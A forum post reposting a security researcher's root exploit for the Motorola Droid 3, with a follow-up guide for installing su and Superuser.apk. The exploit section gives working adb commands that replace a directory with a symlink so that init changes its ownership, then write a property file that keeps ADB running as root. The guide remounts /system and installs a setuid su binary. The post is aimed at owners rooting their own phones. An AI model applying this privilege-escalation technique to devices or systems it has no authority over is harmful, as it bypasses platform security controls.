[HOW-TO] Root Your Droid 3

[guidot]

Originally posted at Droid Forum - Covering all Verizon Droid & Android Phones - Droid, Droid 2, Droid X, Incredible and more by pc747

Security Research by Dan Rosenberg

Have any one tried this:

Rooting the Droid 3

The Motorola Droid 3 was released July 14, 2011, and has no public technique available to get root access. On request of some members of the Android community, I decided to audit the platform in order to root the device.
The Bug

I identified a vulnerability specific to Motorola devices in the script parsed by the init thread (this is existing code, not commands for you to run):

mkdir /data/local 0771 mot_tcmd shell mkdir /data/local/tmp 0771 mot_tcmd shell mkdir /data/local/12m 0771 mot_tcmd shell mkdir /data/local/12m/batch 0771 mot_tcmd shell chown mot_tcmd shell /data/local chown mot_tcmd shell /data/local/12m chown mot_tcmd shell /data/local/12m/batch chown mot_tcmd shell /data/local/tmp Since the contents of /data/local are group “shell” and group-writable, we can modify the contents of this directory using ADB. By logging into the device and replacing one of the sub-directories listed here with a symbolic link, then when the device reboots it will change the ownership of the symlink target to group “shell”. This can be used to edit property files to manipulate the behavior of ADB to achieve root.
So, without further ado:
The Exploit

Log in to the device using “adb shell” and type the following commands:

mv /data/local/12m /data/local/12m.bak ln -s /data /data/local/12m Next, physically reboot the device by pressing the power button. When it wakes up, log in using “adb shell” again, and type the following:

rm /data/local/12m mv /data/local/12m.bak /data/local/12m mv /data/local.prop /data/local.prop.bak echo "ro.sys.atvc_allow_netmon_usb=0" > /data/local.prop echo "ro.sys.atvc_allow_netmon_ih=0" >> /data/local.prop echo "ro.sys.atvc_allow_res_core=0" >> /data/local.prop echo "ro.sys.atvc_allow_res_panic=0" >> /data/local.prop echo "ro.sys.atvc_allow_all_adb=1" >> /data/local.prop echo "ro.sys.atvc_allow_all_core=0" >> /data/local.prop echo "ro.sys.atvc_allow_efem=0" >> /data/local.prop echo "ro.sys.atvc_allow_bp_log=0" >> /data/local.prop echo "ro.sys.atvc_allow_ap_mot_log=0" >> /data/local.prop echo "ro.sys.atvc_allow_gki_log=0" >> /data/local.prop The ro.sys.atvc_allow_all_adb property is a Motorola-specific configuration that prevents ADB from dropping its root privileges. Reboot the device one final time, and on logging in with “adb shell”, you should be presented with a root prompt. Enjoy!
Thanks to mkultramega, Toaday, and zdooder for testing, KrazyKrivda for raising funds, scottml and Edgan for bouncing ideas, and rweb for convincing me to look at Droid 3 in the first place.

Below is a method posted by woodyman along with the zip file for su.

[How To:] Root Your Droid 3

First I want to say I CAN NOT take credit for this nor will I post the full details because they have already been posted, so without further delay, here is a nice simple guide for all of you on how to root your precious Droid 3!

-------------------------

1. Head here and read thorough this once so you at least semi-understand what's going on!
2. If you don't have ADB installed and setup, then do a quick search for a guide there are multiple out there and most are quite good. You can also set it up following the directions straight from Google, but they are a bit complicated if your not entirely sure about this stuff. Android SDK | Android Developers
3. After that, then head HERE again and follow his instructions.
4. At the end when you get the # symbol in ADB for root then you will need to do the following..
5. Download the 2 attached files and save to your desktop
6. First you need to write the system partition as RW so you can write things to it in order to get a permanent root.
7. SO run the following command.
8. Code:
   
   mount -o rw,remount /dev/block/system /system
9. Next copy the 2 attached files from your desktop to the perspective directories on your Droid 3
10. For example my commands where as follows:

Code:

adb push '/home/woodyman/Desktop/su' /system/xbin adb push '/home/woodyman/Desktop/Superuser.apk' /system/appadb shell chmod 4755 /system/xbin/su

---------------------------
This way done using linux, [Ubuntu 11.04] So commands will be a bit different with windows..

This is just a rough quick sketch up for everyone, I will refine it and add more details tonight, I Just wanted to get it up for now so everyone had the chance if they wanted.

Attached Files

• su.zip* (127.2 KB, 3 views)

[Android.net]

Android.net is the premier Android Forum on the internet.